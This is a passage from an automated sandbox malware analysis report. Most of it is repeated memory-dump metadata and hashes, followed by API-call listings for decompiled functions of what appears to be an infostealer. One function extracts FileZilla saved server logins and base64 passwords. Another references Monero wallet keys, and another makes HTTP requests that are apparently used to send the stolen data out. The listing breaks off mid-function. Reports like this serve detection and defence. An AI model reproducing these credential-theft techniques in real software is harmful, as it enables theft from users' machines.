                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: o"~~
                        • API String ID: 0-2143920772
                        • Opcode ID: 6a3f6ebc9b9dd4ecd17243327f46a12a0168c965d0ab011ead603bebd0a72666
                        • Instruction ID: da9215b74a130063e67e4c6fa75e14053ff7adb843ad808e73ca648ad2c9481f
                        • Opcode Fuzzy Hash: 6a3f6ebc9b9dd4ecd17243327f46a12a0168c965d0ab011ead603bebd0a72666
                        • Instruction Fuzzy Hash: D1317CB250C604AFE305BE2ADC416AEFBE6FFD8310F16892DE2D583614EA305440CA87
                        Function 013686EE Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: w//
                        • API String ID: 0-3274472087
                        • Opcode ID: 8eb69b7d9dde8649d2c1a80b0c151f118e379af701f2bf51fa1ca5b556be9819
                        • Instruction ID: 0d2d73bbf07e0f823a10d089f0c490cc570a0f7d18652eccf7f6ecef9b36550c
                        • Opcode Fuzzy Hash: 8eb69b7d9dde8649d2c1a80b0c151f118e379af701f2bf51fa1ca5b556be9819
                        • Instruction Fuzzy Hash: 9B218DB290C2089FE715BE19DC4176EF7E5EFA8310F16892CEBD043350FA3168249A87
                        Function 01231DCF Relevance: .3, Instructions: 252COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2643c13dee63941cf5c88a7475369a35b088a7d4518b71b9fad2cffc1e2df77d
                        • Instruction ID: 4456b1bc2aeeac873a80fbd808569ab0a9c605d6a733311cf4f61521033f1c84
                        • Opcode Fuzzy Hash: 2643c13dee63941cf5c88a7475369a35b088a7d4518b71b9fad2cffc1e2df77d
                        • Instruction Fuzzy Hash: E08127B3A093109BE3045E2DDD4536BF7E6EFD4720F1A853DE6C883744EA7998058693
                        Function 012ADE23 Relevance: .2, Instructions: 207COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2706e5b7aae559a7dd691e35a710eca22c78ff69b64e1f64167963c6ebedd5de
                        • Instruction ID: aaafc6f8cc3943f6a34c34b11e469b7a05357a7aebf5dabfbe745cb714b9d457
                        • Opcode Fuzzy Hash: 2706e5b7aae559a7dd691e35a710eca22c78ff69b64e1f64167963c6ebedd5de
                        • Instruction Fuzzy Hash: 2261F1F36087049BD304AE2DDCC577ABBE4EF54320F06462CEAD587784EA3558048697
                        Function 0121B8D8 Relevance: .2, Instructions: 190COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9c5bf49f493a99c37d6a1e000c05059ab9f9a35e90c0cbf57a5839a11ec6a461
                        • Instruction ID: bbe196d7b76983614b937640491e996a57d9ce4f65bb66dcf100094bba541e77
                        • Opcode Fuzzy Hash: 9c5bf49f493a99c37d6a1e000c05059ab9f9a35e90c0cbf57a5839a11ec6a461
                        • Instruction Fuzzy Hash: C95127B3A0C2049FE3046E29EC8173AFBE5EF59320F16463DE6D987380EA3658458757
                        Function 012410DF Relevance: .2, Instructions: 160COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb64c62ad22b9a53b33cd231357bd54c343c3209c136f9b745d523e0024bead7
                        • Instruction ID: 99f840dd510fcf3edd1a41d8e2e3dccdd3ff6dc2ea518384b4cd210a49af2043
                        • Opcode Fuzzy Hash: fb64c62ad22b9a53b33cd231357bd54c343c3209c136f9b745d523e0024bead7
                        • Instruction Fuzzy Hash: 7C41D2F36087005FE7046E6AECC5B7EFBE9EBD4720F5A883EE28483744E97448458656
                        Function 01360ECE Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d5161c4c1d631052cd7a8c41cc87cc05bae5a67441746f4b66338929b015bf2c
                        • Instruction ID: 75660c2b532650fa30a8a55f78671d2168437f5e240da1de2e2327d8fd0d7f2e
                        • Opcode Fuzzy Hash: d5161c4c1d631052cd7a8c41cc87cc05bae5a67441746f4b66338929b015bf2c
                        • Instruction Fuzzy Hash: EA3160B290D324AFE310BE68D84167AF7E8EF88750F16482EE6D4C7200D6355840CBD3
                        Function 01345C38 Relevance: .1, Instructions: 78COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 511fc4f91e6805470c349973e317286be802cf204b46b8d48e757bfae63a9648
                        • Instruction ID: 1086aca5d943344e890dc727df59b5d4996722c7ea509d9cee175a4801b69857
                        • Opcode Fuzzy Hash: 511fc4f91e6805470c349973e317286be802cf204b46b8d48e757bfae63a9648
                        • Instruction Fuzzy Hash: AD215AB250C304DFE305BF69DC856AEFBE6EF98710F16892DD6D582610E73598408A47
                        Function 00F19750 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Function 00F10250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F18E0B
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F099EC
                          • Part of subcall function 00F099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F09A11
                          • Part of subcall function 00F099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F09A31
                          • Part of subcall function 00F099C0: ReadFile.KERNEL32(000000FF,?,00000000,00F0148F,00000000), ref: 00F09A5A
                          • Part of subcall function 00F099C0: LocalFree.KERNEL32(00F0148F), ref: 00F09A90
                          • Part of subcall function 00F099C0: CloseHandle.KERNEL32(000000FF), ref: 00F09A9A
                          • Part of subcall function 00F18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F18E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00F20DBA,00F20DB7,00F20DB6,00F20DB3), ref: 00F10362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F10369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00F10385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F10393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00F103CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F103DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00F10419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F10427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00F10463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F10475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F10502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F1051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F10532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F1054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00F10562
                        • lstrcat.KERNEL32(?,profile: null), ref: 00F10571
                        • lstrcat.KERNEL32(?,url: ), ref: 00F10580
                        • lstrcat.KERNEL32(?,00000000), ref: 00F10593
                        • lstrcat.KERNEL32(?,00F21678), ref: 00F105A2
                        • lstrcat.KERNEL32(?,00000000), ref: 00F105B5
                        • lstrcat.KERNEL32(?,00F2167C), ref: 00F105C4
                        • lstrcat.KERNEL32(?,login: ), ref: 00F105D3
                        • lstrcat.KERNEL32(?,00000000), ref: 00F105E6
                        • lstrcat.KERNEL32(?,00F21688), ref: 00F105F5
                        • lstrcat.KERNEL32(?,password: ), ref: 00F10604
                        • lstrcat.KERNEL32(?,00000000), ref: 00F10617
                        • lstrcat.KERNEL32(?,00F21698), ref: 00F10626
                        • lstrcat.KERNEL32(?,00F2169C), ref: 00F10635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F1068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 4a16b61db87c223ca102430091261811bc593c752186c311e4e02b9b1f2e8e86
                        • Instruction ID: 6107d5ac8c7954cf06a1cbee1b5867f4f3176e81a316408672bb4bcb8437c29f
                        • Opcode Fuzzy Hash: 4a16b61db87c223ca102430091261811bc593c752186c311e4e02b9b1f2e8e86
                        • Instruction Fuzzy Hash: F1D16F75941108ABDB14EBF0ED96EEE7738FF14711F404428F113A7085EE78AA86EB61
                        Function 00F05960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F04839
                          • Part of subcall function 00F047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F04849
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F059F8
                        • StrCmpCA.SHLWAPI(?,008AF278), ref: 00F05A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F05B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008AF328,00000000,?,008AAF70,00000000,?,00F21A1C), ref: 00F05E71
                        • lstrlen.KERNEL32(00000000), ref: 00F05E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00F05E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F05E9A
                        • lstrlen.KERNEL32(00000000), ref: 00F05EAF
                        • lstrlen.KERNEL32(00000000), ref: 00F05ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F05EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00F05F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F05F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00F05F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00F05FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00F05FBD
                        • HttpOpenRequestA.WININET(00000000,008AF258,?,008AE690,00000000,00000000,00400100,00000000), ref: 00F05BF8
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
